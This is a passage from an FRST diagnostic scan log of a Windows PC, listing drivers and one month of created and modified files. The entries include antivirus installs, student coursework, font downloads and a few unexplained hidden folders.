S3 mferkdet; C:\WINDOWS\System32\drivers\mferkdet.sys [125688 2021-04-25] (McAfee, Inc. -> McAfee, Inc.)
R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [252352 2020-12-11] (McAfee, Inc. -> McAfee, LLC)
S3 tapnordvpn; C:\WINDOWS\System32\drivers\tapnordvpn.sys [44896 2018-07-24] (TEFINCOM S.A. -> The OpenVPN Project)
S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [49560 2021-04-11] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [421088 2021-04-11] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [72928 2021-04-11] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-05-06 15:39 - 2021-05-06 15:53 - 000052831 _____ C:\Users\FRANCIS\Downloads\Addition.txt
2021-05-06 15:34 - 2021-05-07 11:02 - 000032662 _____ C:\Users\FRANCIS\Downloads\FRST.txt
2021-05-06 15:33 - 2021-05-07 10:59 - 000000000 ____D C:\FRST
2021-05-06 15:32 - 2021-05-06 15:32 - 002298368 _____ (Farbar) C:\Users\FRANCIS\Downloads\FRST64.exe
2021-05-06 14:48 - 2021-05-06 14:48 - 000000000 ___HD C:\ProgramData\Kawmq
2021-05-06 14:25 - 2021-05-06 14:25 - 001310832 _____ (Google LLC) C:\Users\FRANCIS\Downloads\ChromeSetup.exe
2021-05-06 11:57 - 2021-05-06 11:57 - 001687040 _____ C:\WINDOWS\system32\libcrypto.dll
2021-05-06 11:56 - 2021-05-06 11:56 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2021-05-06 11:56 - 2021-05-06 11:56 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2021-05-06 11:56 - 2021-05-06 11:56 - 001314120 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2021-05-06 11:56 - 2021-05-06 11:56 - 000700928 _____ C:\WINDOWS\system32\FsNVSDeviceSource.dll
2021-05-06 11:56 - 2021-05-06 11:56 - 000011351 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-05-06 11:54 - 2021-05-06 11:54 - 001163776 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-05-06 11:53 - 2021-05-06 11:53 - 001823816 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2021-05-06 11:53 - 2021-05-06 11:53 - 001393504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2021-05-06 11:53 - 2021-05-06 11:53 - 000060928 _____ C:\WINDOWS\system32\runexehelper.exe
2021-05-06 11:51 - 2021-05-06 11:51 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-05-06 11:51 - 2021-05-06 11:51 - 000013312 _____ C:\WINDOWS\system32\agentactivationruntimestarter.exe
2021-05-06 11:38 - 2021-05-06 11:38 - 000002040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2021-05-06 11:38 - 2021-05-06 11:38 - 000002028 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2021-05-06 11:38 - 2021-05-06 11:38 - 000002028 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2021-05-06 11:38 - 2021-05-06 11:38 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\mbam
2021-05-06 11:37 - 2021-05-06 11:37 - 000220752 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys
2021-05-06 11:36 - 2021-05-06 11:36 - 000248992 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2021-05-06 11:35 - 2021-05-06 11:34 - 000199128 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2021-05-06 11:34 - 2021-05-06 11:34 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-05-06 11:28 - 2021-05-06 11:28 - 000000000 ____D C:\Program Files\Malwarebytes
2021-05-06 09:27 - 2021-05-06 09:27 - 002078632 _____ (Malwarebytes) C:\Users\FRANCIS\Downloads\MBSetup.exe
2021-05-05 21:10 - 2021-05-06 10:23 - 000000000 ____D C:\Users\FRANCIS\Desktop\Hello Paris
2021-05-05 13:04 - 2021-05-05 13:05 - 000736768 _____ C:\Users\FRANCIS\Downloads\mws_gen_ode_ppt_euler.ppt
2021-05-04 20:39 - 2021-05-04 20:40 - 003578240 _____ (RCS LT) C:\Users\FRANCIS\Downloads\CCSetup.exe
2021-05-04 18:04 - 2021-05-04 18:04 - 000001134 _____ C:\Users\Public\Desktop\Web Navigation.lnk
2021-05-04 18:04 - 2021-05-04 18:04 - 000001134 _____ C:\ProgramData\Desktop\Web Navigation.lnk
2021-05-04 17:36 - 2019-02-01 11:20 - 000020936 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2021-05-04 17:35 - 2021-05-04 17:35 - 000000000 ____D C:\WINDOWS\system32\Drivers\etc\BACKUP
2021-05-04 09:30 - 2021-05-04 09:30 - 000125168 _____ (Zoom Video Communications, Inc.) C:\Users\FRANCIS\Downloads\Zoom_cm_ds_mv9ZFe0KOjFvdR5MS6xrZlbbY96oVd7AAzLVq@UT4O-2pbNxQCn-E8_kc4bbc386e4a84bbc_.exe
2021-05-03 21:46 - 2021-05-03 21:46 - 000112099 _____ C:\Users\FRANCIS\Downloads\Enriquez_JamesCarl_MP14.pdf
2021-05-03 20:58 - 2021-05-03 20:58 - 000012872 _____ (SurfRight B.V.) C:\WINDOWS\system32\bootdelete.exe
2021-05-03 19:54 - 2021-05-03 19:54 - 000206596 _____ C:\Users\FRANCIS\Downloads\Pentecostes_Daniela_MP12.pdf
2021-05-02 19:45 - 2021-05-02 19:45 - 001345893 _____ C:\Users\FRANCIS\Downloads\PS2.1-Ramos-Riano-San-Pedro-Santiago.pdf
2021-05-02 18:35 - 2021-05-02 18:35 - 000043135 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210502-103502.zip
2021-05-02 17:52 - 2021-05-02 18:02 - 000000000 ____D C:\Users\FRANCIS\Desktop\Quarterpound
2021-05-02 16:41 - 2021-05-02 16:41 - 000001131 _____ C:\Users\FRANCIS\Desktop\CLUE Classic.lnk
2021-05-02 16:41 - 2021-05-02 16:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CLUE Classic
2021-05-02 16:16 - 2021-05-02 16:16 - 000000000 ____D C:\Users\FRANCIS\Desktop\fonts-main
2021-05-02 16:14 - 2021-04-19 10:46 - 654079606 _____ C:\Users\FRANCIS\Desktop\fonts-main.zip
2021-05-02 16:02 - 2021-05-02 17:07 - 000000000 ____D C:\Program Files (x86)\CLUE Classic
2021-05-02 15:51 - 2021-05-02 15:51 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v4 - [FileWomen]
2021-05-02 15:42 - 2021-05-02 15:43 - 000000000 ____D C:\Users\FRANCIS\AppData\LocalLow\BitTorrent
2021-05-02 15:26 - 2021-05-02 15:26 - 000000000 ____D C:\Program Files (x86)\ReflexiveArcade
2021-05-01 20:38 - 2021-05-01 20:38 - 000427332 _____ C:\Users\FRANCIS\Downloads\Frankenstein-by-Shelley.txt
2021-05-01 20:38 - 2021-05-01 20:38 - 000000042 _____ C:\Users\FRANCIS\Downloads\simple.txt
2021-05-01 20:35 - 2021-05-01 20:35 - 000675711 _____ C:\Users\FRANCIS\Downloads\Distances.xlsx
2021-05-01 19:09 - 2021-05-01 19:09 - 000012176 _____ C:\Users\FRANCIS\Downloads\Introduction-to-Programming-with-MATLAB-solutions--master.zip
2021-05-01 19:09 - 2019-03-13 12:58 - 000000000 ____D C:\Users\FRANCIS\Desktop\Introduction-to-Programming-with-MATLAB-solutions--master
2021-05-01 18:42 - 2021-05-01 18:42 - 002308003 _____ C:\Users\FRANCIS\Downloads\introduction-to-programming-with-matlab-master.zip
2021-05-01 10:23 - 2021-05-01 10:23 - 000113329 _____ C:\Users\FRANCIS\Downloads\financials sample template format only(1)(1).xlsx
2021-04-30 18:04 - 2021-04-30 18:04 - 000112886 _____ C:\Users\FRANCIS\Downloads\financials sample template format (incomplete) (1).xlsx
2021-04-30 17:03 - 2021-04-30 17:04 - 000026514 _____ C:\Users\FRANCIS\Downloads\Book1-KeyAssumptions.xlsx
2021-04-29 20:20 - 2021-04-29 20:20 - 000959197 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-121954.zip
2021-04-29 20:05 - 2021-04-29 20:05 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Recovery Toolbox for RAR
2021-04-29 18:39 - 2021-04-29 18:40 - 000931837 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-103853.zip
2021-04-29 18:37 - 2021-04-29 18:37 - 001064473 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-103705.zip
2021-04-29 17:22 - 2021-04-29 17:22 - 000053020 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-092143.zip
2021-04-28 14:50 - 2021-04-28 14:51 - 000112886 _____ C:\Users\FRANCIS\Downloads\financials sample template format (incomplete).xlsx
2021-04-28 13:20 - 2021-04-28 13:20 - 000003018 _____ C:\WINDOWS\system32\Tasks\McInstruTrack
2021-04-28 13:17 - 2021-04-28 13:17 - 000002138 _____ C:\Users\Public\Desktop\McAfee® Total Protection.lnk
2021-04-28 13:17 - 2021-04-28 13:17 - 000002138 _____ C:\ProgramData\Desktop\McAfee® Total Protection.lnk
2021-04-28 13:15 - 2021-05-07 10:50 - 000000000 __RSD C:\Users\FRANCIS\Documents\McAfee Vaults
2021-04-28 13:15 - 2021-04-28 13:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2021-04-28 13:15 - 2021-04-28 13:15 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\McAfee File Lock
2021-04-28 13:15 - 2021-01-18 02:58 - 000089112 _____ (McAfee, LLC) C:\WINDOWS\system32\Drivers\McPvDrv.sys
2021-04-28 13:15 - 2020-05-26 00:12 - 000089096 _____ (McAfee, LLC) C:\WINDOWS\system32\Drivers\SET8D4E.tmp
2021-04-28 13:14 - 2020-05-26 00:11 - 000218960 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\HipShieldK.sys
2021-04-28 13:08 - 2021-04-28 16:51 - 000003316 _____ C:\WINDOWS\system32\Tasks\McAfeeLogon
2021-04-28 13:01 - 2021-05-05 14:53 - 000000000 ____D C:\Program Files (x86)\McAfee
2021-04-28 13:01 - 2021-04-28 16:53 - 000000000 ____D C:\Program Files\McAfee
2021-04-28 13:01 - 2021-04-28 16:52 - 000000000 ____D C:\Program Files\Common Files\McAfee
2021-04-28 13:01 - 2021-04-28 14:07 - 000003706 _____ C:\WINDOWS\system32\Tasks\McAfee Remediation (Prepare)
2021-04-28 13:01 - 2021-04-28 13:04 - 000000000 ____D C:\Program Files\McAfee.com
2021-04-28 13:01 - 2021-04-28 13:01 - 000000000 ____D C:\Program Files\Common Files\AV
2021-04-28 09:18 - 2021-04-28 13:22 - 000000049 _____ C:\Users\FRANCIS\AppData\Roaming\MCVi2UserDetail.ini
2021-04-28 09:10 - 2021-04-28 09:14 - 005794408 _____ (McAfee, LLC) C:\Users\FRANCIS\Downloads\mcafee_trial_setup_433.0207.3919_key.exe
2021-04-27 19:32 - 2021-04-27 19:32 - 000205659 _____ C:\Users\FRANCIS\Downloads\chapter_9__Practice_questions_and_solutions.docx.pdf
2021-04-27 18:30 - 2021-04-27 18:30 - 000178921 _____ C:\Users\FRANCIS\Downloads\chapter_8_practice_questions_solution.docx.pdf
2021-04-27 18:06 - 2021-04-27 18:08 - 004323668 _____ C:\Users\FRANCIS\Downloads\Gas Power  Cycle.zip
2021-04-27 18:06 - 2021-04-27 18:06 - 001022464 _____ 
C:\Users\FRANCIS\Downloads\Lecture 2 Gas Power Cycle.ppt 2021-04-27 18:04 - 2021-04-27 18:05 - 004372125 _____ C:\Users\FRANCIS\Downloads\Rankine Cycle with Regeneration.zip 2021-04-27 09:00 - 2021-04-27 09:00 - 000030252 _____ C:\WINDOWS\system32\servers.def.lkg 2021-04-27 09:00 - 2021-04-27 09:00 - 000030252 _____ C:\WINDOWS\system32\servers.def 2021-04-27 09:00 - 2021-04-27 09:00 - 000011324 _____ C:\WINDOWS\system32\uat64.vpx 2021-04-27 09:00 - 2021-04-27 09:00 - 000003313 _____ C:\WINDOWS\system32\servers.def.vpx 2021-04-27 09:00 - 2021-04-27 09:00 - 000003304 _____ C:\WINDOWS\system32\.tmp 2021-04-27 09:00 - 2021-04-27 09:00 - 000000604 _____ C:\WINDOWS\system32\prod-pgm.vpx 2021-04-27 09:00 - 2021-04-27 09:00 - 000000342 _____ C:\WINDOWS\system32\prod-vps.vpx 2021-04-26 20:34 - 2021-04-26 20:34 - 000282407 _____ C:\Users\FRANCIS\Downloads\Enriquez_JamesCarl_MP10.pdf 2021-04-25 17:25 - 2021-05-07 09:12 - 000000000 ____D C:\WINDOWS\system32\Tasks\McAfee 2021-04-25 17:14 - 2021-04-25 17:14 - 000125688 _____ (McAfee, Inc.) 
C:\WINDOWS\system32\Drivers\mferkdet.sys 2021-04-25 17:09 - 2020-12-10 20:36 - 000583720 _____ (McAfee, LLC) C:\WINDOWS\system32\mfevtps.exe 2021-04-25 17:08 - 2021-04-28 16:44 - 000000000 ____D C:\ProgramData\McAfee 2021-04-25 16:45 - 2021-05-06 14:34 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job 2021-04-25 16:44 - 2021-05-06 14:42 - 000388514 _____ C:\WINDOWS\ntbtlog.txt 2021-04-25 11:05 - 2021-04-26 17:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\Avast Software 2021-04-25 11:04 - 2021-04-25 11:04 - 000000000 ____D C:\Program Files\Common Files\Avast Software 2021-04-25 10:25 - 2021-04-25 10:25 - 000220392 _____ (AVAST Software) C:\Users\FRANCIS\Downloads\avast_free_antivirus_setup_online.exe 2021-04-23 21:06 - 2021-04-23 21:24 - 000000000 _RSHD C:\ProgramData\Key-Base 2021-04-23 21:06 - 2021-04-23 21:06 - 000000000 ____D C:\ProgramData\{42AFAFAD-2FE9-D459-E932-738DED275782} 2021-04-23 21:00 - 2021-04-23 21:05 - 009772064 _____ (Stellar Information Technology Pvt Ltd ) C:\Users\FRANCIS\Downloads\StellarRepairforPhoto.exe 2021-04-23 20:31 - 2021-04-23 20:31 - 000000000 ____D C:\Users\FRANCIS\Desktop\Easeus 23 20_31 2021-04-23 16:46 - 2021-04-23 16:46 - 000550953 _____ C:\Users\FRANCIS\Downloads\Rebyu.pdf 2021-04-23 15:43 - 2021-04-23 15:43 - 000528434 _____ C:\Users\FRANCIS\Downloads\MARKETING_PLAN_TECHNICAL_PLAN_PRICING_PLAN.docx.pdf 2021-04-23 15:26 - 2021-04-23 15:27 - 004500974 _____ C:\Users\FRANCIS\Downloads\IE103_FINAL_BUSINESS_PLAN_FACE_SHIELD.docx.pdf 2021-04-23 15:24 - 2021-04-23 15:24 - 000787017 _____ C:\Users\FRANCIS\Downloads\CADELI__A_AMIEL_Technical_Plan_InventorEaze.docx.pdf 2021-04-22 21:21 - 2021-04-23 12:12 - 000000000 ____D C:\Users\FRANCIS\Downloads\sims3worldtool167 2021-04-22 21:18 - 2021-04-22 21:18 - 000008531 _____ C:\Users\FRANCIS\Downloads\sims3worldtool167_archive.torrent 2021-04-21 16:53 - 2021-04-21 16:53 - 000041503 _____ C:\Users\FRANCIS\Downloads\financials sample template format updated 4-21-21.xlsx 
2021-04-21 15:55 - 2021-04-21 15:55 - 000000000 ____D C:\Users\FRANCIS\Downloads\PengRobinson 2021-04-21 15:54 - 2021-04-21 15:54 - 000001965 _____ C:\Users\FRANCIS\Downloads\PengRobinson.zip 2021-04-21 15:03 - 2021-04-21 15:03 - 000000000 ____D C:\Users\FRANCIS\Downloads\Lecture 5. Finding the Roots 2021-04-19 09:34 - 2021-04-19 09:34 - 000000000 ____D C:\Users\FRANCIS\Downloads\Mission Gothic 2021-04-18 10:22 - 2021-04-18 10:22 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Carved 2021-04-18 10:21 - 2021-04-18 10:21 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Sans 2021-04-18 10:20 - 2021-04-18 10:21 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Slab 2021-04-18 10:16 - 2021-04-18 10:19 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Slab Rough 2021-04-17 21:49 - 2021-04-17 21:50 - 027357835 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-134918.zip 2021-04-17 21:34 - 2021-04-17 21:36 - 025680562 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-133438.zip 2021-04-17 20:29 - 2021-04-17 20:30 - 001378716 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122915.zip 2021-04-17 20:27 - 2021-04-17 20:27 - 001391374 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122711.zip 2021-04-17 20:24 - 2021-04-17 20:24 - 001307436 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122359.zip 2021-04-17 20:22 - 2021-04-17 20:22 - 001320474 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122211.zip 2021-04-17 20:15 - 2021-04-17 20:16 - 001642500 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-121554.zip 2021-04-17 20:13 - 2021-04-17 20:14 - 001642946 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-121341.zip 2021-04-17 18:02 - 2021-04-17 18:03 - 051943779 _____ C:\Users\FRANCIS\Downloads\Problem Exercise 8.7 Power Cycle with regeneration.pdf 2021-04-17 16:37 - 2021-04-17 16:39 - 001959151 _____ C:\Users\FRANCIS\Downloads\Chapter 9.  
Refrigeration and Liquefaction MCA.pptx 2021-04-17 16:28 - 2021-04-17 16:29 - 001329415 _____ C:\Users\FRANCIS\Downloads\Lecture 5. Finding the Roots.zip 2021-04-16 18:23 - 2021-04-20 09:44 - 000138601 _____ C:\Users\FRANCIS\Downloads\litmusports-results.pptx 2021-04-16 13:26 - 2021-04-16 13:26 - 000231248 _____ C:\WINDOWS\system32\containerdevicemanagement.dll 2021-04-15 20:59 - 2021-04-19 20:45 - 000000000 ____D C:\Users\FRANCIS\Desktop\YB COLLECTION 2021-04-15 16:21 - 2021-04-15 16:21 - 000043972 _____ C:\Users\FRANCIS\Downloads\11401.zip 2021-04-15 11:58 - 2020-08-14 15:59 - 000043416 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\NvModuleTracker.sys 2021-04-14 20:20 - 2021-04-14 20:22 - 000000000 ____D C:\Users\FRANCIS\Downloads\Eurostile Next 2021-04-14 20:20 - 2021-04-14 20:20 - 000000000 ____D C:\Users\FRANCIS\Downloads\American Typewriter 2021-04-14 20:19 - 2021-04-14 20:19 - 000000000 ____D C:\Users\FRANCIS\Downloads\Bebas Neue Pro 2021-04-14 20:18 - 2021-04-14 20:18 - 000000000 ____D C:\Users\FRANCIS\Downloads\Bebas Kai 2021-04-14 20:17 - 2021-04-14 20:18 - 000000000 ____D C:\Users\FRANCIS\Downloads\Bebas Neue 2021-04-14 20:17 - 2021-04-14 20:17 - 000000000 ____D C:\Users\FRANCIS\Downloads\Rosewood 2021-04-14 20:16 - 2021-04-14 20:16 - 000000000 ____D C:\Users\FRANCIS\Downloads\One Stroke Script 2021-04-14 17:44 - 2021-04-14 17:45 - 000714992 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-093253.zip 2021-04-14 17:06 - 2021-04-14 17:06 - 000073143 _____ C:\Users\FRANCIS\Downloads\the-sims-sans-cufonfonts.zip 2021-04-14 17:05 - 2021-04-14 17:05 - 000073333 _____ C:\Users\FRANCIS\Downloads\The-Sims-Sans-Font.zip 2021-04-14 16:25 - 2021-04-14 16:25 - 000575764 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-082508.zip 2021-04-14 16:24 - 2021-04-14 16:24 - 001638615 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-082414.zip 2021-04-14 16:18 - 2021-04-14 16:18 - 001593898 _____ 
C:\Users\FRANCIS\Downloads\transfonter.org-20210414-081827.zip 2021-04-14 16:15 - 2021-04-14 16:16 - 002110967 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-081533.zip 2021-04-13 18:08 - 2021-04-13 18:09 - 002648212 _____ C:\Users\FRANCIS\Downloads\eurostile-next-pro-cufonfonts.zip 2021-04-13 17:42 - 2021-04-13 17:42 - 000205230 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-094200.zip 2021-04-13 17:27 - 2021-04-13 17:27 - 000086034 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-092705.zip 2021-04-13 15:22 - 2021-04-13 15:22 - 000094518 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-072238.zip 2021-04-13 15:20 - 2021-04-13 15:20 - 000043667 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-072045.zip 2021-04-13 15:19 - 2021-04-13 15:19 - 000021551 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-071930.zip 2021-04-13 15:17 - 2021-04-13 15:17 - 001318241 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-071720.zip 2021-04-13 15:16 - 2021-04-13 15:16 - 001336842 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-071602.zip 2021-04-13 12:34 - 2021-04-13 12:35 - 000000000 ____D C:\Users\FRANCIS\Downloads\Akko 2021-04-13 12:34 - 2021-04-13 12:34 - 000000000 ____D C:\Users\FRANCIS\Downloads\FF Trademarker 2021-04-13 12:27 - 2021-04-13 12:28 - 000398306 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-042745.zip 2021-04-13 12:23 - 2021-04-13 12:23 - 000808345 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-042301.zip 2021-04-13 12:21 - 2021-04-13 12:21 - 001808740 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-042057.zip 2021-04-13 11:49 - 2021-04-13 11:49 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\npm-cache 2021-04-13 11:28 - 2021-04-13 11:30 - 000000000 ____D C:\Python39 2021-04-13 11:28 - 2021-04-13 11:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 3.9 2021-04-13 11:28 - 2021-04-13 11:28 - 000000000 ____D 
C:\Users\FRANCIS\AppData\Local\Package Cache 2021-04-13 11:08 - 2021-04-13 11:28 - 000000000 ____D C:\ProgramData\chocolatey 2021-04-13 11:04 - 2021-04-13 11:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js 2021-04-13 11:04 - 2021-04-13 11:05 - 000000000 ____D C:\Program Files\nodejs 2021-04-13 11:04 - 2021-04-13 11:04 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\npm 2021-04-13 10:48 - 2021-04-13 11:02 - 028917760 _____ C:\Users\FRANCIS\Downloads\node-v15.14.0-x64.msi 2021-04-12 20:14 - 2021-04-12 20:14 - 000000000 ____D C:\Users\FRANCIS\Downloads\myfonts-win.exe 2021-04-12 20:14 - 2021-04-12 20:13 - 018481401 _____ C:\Users\FRANCIS\Downloads\myfonts-win.exe.zip 2021-04-12 18:29 - 2021-05-02 09:50 - 000000000 ____D C:\Users\FRANCIS\Desktop\myfonts-downloader 2021-04-12 18:29 - 2021-04-12 18:27 - 000003240 _____ C:\Users\FRANCIS\Downloads\myfonts-downloader.zip 2021-04-12 18:09 - 2021-05-06 15:20 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Code 2021-04-12 18:09 - 2021-05-06 09:42 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code 2021-04-12 18:09 - 2021-04-12 18:09 - 000001413 _____ C:\Users\FRANCIS\Desktop\Visual Studio Code.lnk 2021-04-12 18:09 - 2021-04-12 18:09 - 000000000 ____D C:\Users\FRANCIS\.vscode 2021-04-10 20:36 - 2021-04-11 14:46 - 000000000 ____D C:\Users\FRANCIS\Downloads\Maude 1972 to 1978 (Complete TV series in MP4 format) 2021-04-10 18:42 - 2021-04-10 18:42 - 000000000 ____D C:\Program Files (x86)\LooksBuilder 2021-04-08 15:15 - 2021-04-08 15:15 - 000000000 ____D C:\Program Files (x86)\Teams Installer 2021-04-08 15:12 - 2021-04-08 15:12 - 000002463 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002458 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start 
Menu\Programs\PowerPoint.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000002421 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000002420 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000002414 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000002408 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000002400 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote.lnk
2021-04-08 15:12 - 2021-04-08 15:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
2021-04-08 15:11 - 2021-04-08 15:11 - 000000000 ____D C:\Program Files\Common Files\DESIGNER
2021-04-08 13:22 - 2021-05-02 14:24 - 000000000 ____D C:\Program Files\Microsoft Office
2021-04-08 13:22 - 2021-04-08 13:22 - 000000000 ____D C:\Program Files\Microsoft Office 15
2021-04-08 13:16 - 2021-04-08 13:16 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Beta Apps
2021-04-07 09:58 - 2021-05-03 22:05 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\discord
2021-04-07 09:58 - 2021-05-03 21:16 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Discord
2021-04-07 09:58 - 2021-04-07 09:58 - 000002244 _____ C:\Users\FRANCIS\Desktop\Discord.lnk
2021-04-07 09:58 - 2021-04-07 09:58 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-05-07 11:04 - 2019-10-03 20:00 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData 2021-05-07 11:04 - 2019-10-03 20:00 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData 2021-05-07 10:53 - 2019-12-07 17:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2021-05-07 10:53 - 2019-05-24 05:05 - 000000000 ___RD C:\Users\FRANCIS\OneDrive 2021-05-07 10:51 - 2020-09-28 20:13 - 000000000 ____D C:\ProgramData\NVIDIA 2021-05-07 10:49 - 2019-05-24 05:02 - 000000000 __SHD C:\Users\FRANCIS\IntelGraphicsProfiles 2021-05-07 10:47 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\Registration 2021-05-07 10:46 - 2020-09-30 19:34 - 001262352 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2021-05-07 10:44 - 2020-09-30 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2021-05-07 10:44 - 2020-09-30 19:34 - 000008192 ___SH C:\DumpStack.log.tmp 2021-05-07 10:44 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\ServiceState 2021-05-07 10:43 - 2019-12-07 17:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI 2021-05-07 10:37 - 2020-09-28 22:08 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Packages 2021-05-07 10:37 - 2019-12-07 17:14 - 000000000 ___HD C:\Program Files\WindowsApps 2021-05-07 10:37 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\AppReadiness 2021-05-07 10:19 - 2020-11-14 21:01 - 000000000 ____D C:\Program Files\Common Files\Adobe 2021-05-07 10:19 - 2020-11-14 21:00 - 000000000 ____D C:\Program Files\Adobe 2021-05-07 10:19 - 2020-09-28 22:08 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Adobe 2021-05-07 10:19 - 2019-07-08 11:54 - 000000000 ____D C:\Users\Public\Documents\Adobe 2021-05-07 10:19 - 2019-07-08 11:54 - 000000000 ____D C:\ProgramData\Documents\Adobe 2021-05-07 10:17 - 2020-10-07 18:23 - 000000000 ____D C:\ProgramData\Adobe 2021-05-07 09:56 - 2020-10-07 18:26 - 000000000 ____D C:\Program Files (x86)\Adobe 2021-05-07 09:56 - 2020-10-05 12:44 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Adobe 2021-05-07 08:42 - 2020-09-30 19:58 - 000859788 